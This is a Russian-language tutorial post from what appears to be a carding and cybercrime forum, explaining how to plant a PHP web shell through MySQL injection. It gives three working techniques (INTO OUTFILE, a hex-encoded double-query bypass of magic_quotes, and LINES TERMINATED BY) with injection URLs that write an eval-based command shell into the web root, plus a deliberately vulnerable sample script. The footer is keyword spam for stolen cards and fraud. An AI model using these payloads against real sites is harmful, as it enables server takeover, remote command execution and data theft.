Cyber Security Forum

Cyber Security Forum (https://carders.zone/index.php)
-   Статьи (https://carders.zone/forumdisplay.php?f=28)
-   -   Заливка шелла через MySQL Injection (https://carders.zone/showthread.php?t=70)

Cartographer 08-22-2013 08:55 PM
Заливка шелла через MySQL Injection
 
Заливка шелла через MySQL Injection

I. Into Outfile

Требования:
magic_quotes_gpc = Off
file_priv = Y
полный путь
папка с правами на запись

Допустим у нас есть SQL инъекция с выводом:
Код:

http://localhost/sql/test.php?id=-1+...lect+1,2,3--+1

Узнаем имя пользователя БД, под которым мы сидим:
Код:

http://localhost/sql/test.php?id=-1+...1,user(),3--+1

Проверяем, есть ли файловые привелегии у нашего юзера:
Код:

http://localhost/sql/test.php?id=-1+...;root'--+1

Заливаем мини-шелл:
Код:

http://localhost/sql/test.php?id=-1+union+select+1,'<?php eval($_REQUEST[cmd]); ?>',3+from+mysql.user+into+outfile+'D:/A/xampp/htdocs/sql/s.php'--+1

II. Into Outfile + двойной запрос (метод Scipio)

Требования:
file_priv = Y
полный путь
папка с правами на запись

Предположим, что инъекция удовлетворяет условиям из предыдущего примера, но mq=ON, т.е. кавычки фильтруются, но работаем мы со скриптом следующего содержания:
PHP код:
<?php
mysql_connect('localhost','root','');
mysql_select_db('test');
$id=$_GET["id"];
$sql = "SELECT id,email,name FROM `user` where id=".$id;
$result = mysql_query($sql);
while($res = mysql_fetch_array($result)) {
echo $res['email'].":".$res['name']."<br>";
$sql2 = mysql_query("SELECT uid,auto FROM autos WHERE uid = ".$res["id"]);
while($res2 = mysql_fetch_array($sql2))
echo $res2["uid"].':'.$res2["auto"];
}
?>
Видим, что данные из первого запроса (id из $sql), попадают во второй запрос $sql2.
Попробуем захексить кавычку и подставить в наш запрос:
Код:

http://localhost/sql/test.php?id=-1+...t+0x27,2,3--+1

Видим ошибку. Из скрипта видно, что во втором запросе 2 колонки, захексим второй запрос -1 union select 'ded',777--+1 и подставим в инъекцию:
Код:

http://localhost/sql/test.php?id=-1+...2d2031,2,3--+1

Данные успешно выводятся, таким образом мы можем обойти magic_quotes_gpc и залить шелл, хексим запрос -1 union select '<?php eval($_REQUEST[cmd]); ?>',777+from+mysql.user+into+outfile+'D:/A/xampp/htdocs/sql/d.php'--+1 и подставляем в инъекцию:
Код:

http://localhost/sql/test.php?id=-1+...2d2031,2,3--+1

III. Into Outfile + Lines Terminated By

Требования:
magic_quotes_gpc = Off
file_priv = Y
полный путь
папка с правами на запись
инъекция в аргументе WHERE(LIMIT,ORDER BY)

Заливаем шелл запросом:
Код:

http://localhost/sql/test.php?id=1+limit+1+into+outfile+'D:/A/xampp/htdocs/sql/b.php'+lines+terminated+by+'<?php eval($_REQUEST[cmd]); ?>'--+1
(с)Ded MustD!e


All times are GMT. The time now is 10:33 AM.

Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2024, vBulletin Solutions, Inc.
vB.Sponsors

Cybercrime forum, cybercrime site, ,fraud forum, russian fraud forum, Credit cards, carder, infraud, carders.ws, crdpro, fraudsters, darkpro, crdcrew, dumps, cvv, cc, stuff carding, legit seller, vendor, free cvv, dumps+pin, skimmer, ,shimmer, emv software, emv chip writer, free cc+cvv, valid cards, track 2, free cvv, dump pin, dumps, cvv, cc, credit cards, real carding, legit vendor, carder forum, carding tutorial, russian hackers, online cvv shop, track 101, enroll, fullz